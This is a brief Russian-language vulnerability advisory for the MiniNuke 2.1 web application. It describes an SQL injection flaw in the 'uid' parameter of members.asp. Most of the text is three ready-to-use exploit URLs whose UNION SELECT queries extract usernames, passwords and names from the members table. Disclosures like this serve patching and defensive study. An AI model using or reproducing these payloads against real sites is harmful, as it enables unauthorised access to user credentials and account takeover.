Программа: MiniNuke 2.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «uid» сценарием members.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
members.asp?action=member_details&uid=SQL (exploit)
EXPLOIT 1:
members.asp?action=member_details&uid=-1%20union%20select%200,sifre,0,0 ,0,0,0,kul_adi,0,sifre,kul_adi,sifre,1,1,1,sifre,1,1,1, isim,1,1,1,1,1,1,1,1%20from%20members
EXPLOIT 2:
members.asp?action=member_details&uid=-1%20union%20select%200,0,0,0,0,0,0, sifre,0,sifre,0,1,1,sifre,14,sifre,1,1,1,1,2,1,2,2,2,2,2,2,2,2%20from%20members
EXPLLOIT 3:
members.asp?action=member_details&uid=-1%20union%20select%200,1,sifre,0,0, 0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,kul_adi,sifre,2,kul_adi,sifre,2,2,2, sifre,3,3,3,isim,3,3,3,3,3,4,4,4%20from%20members
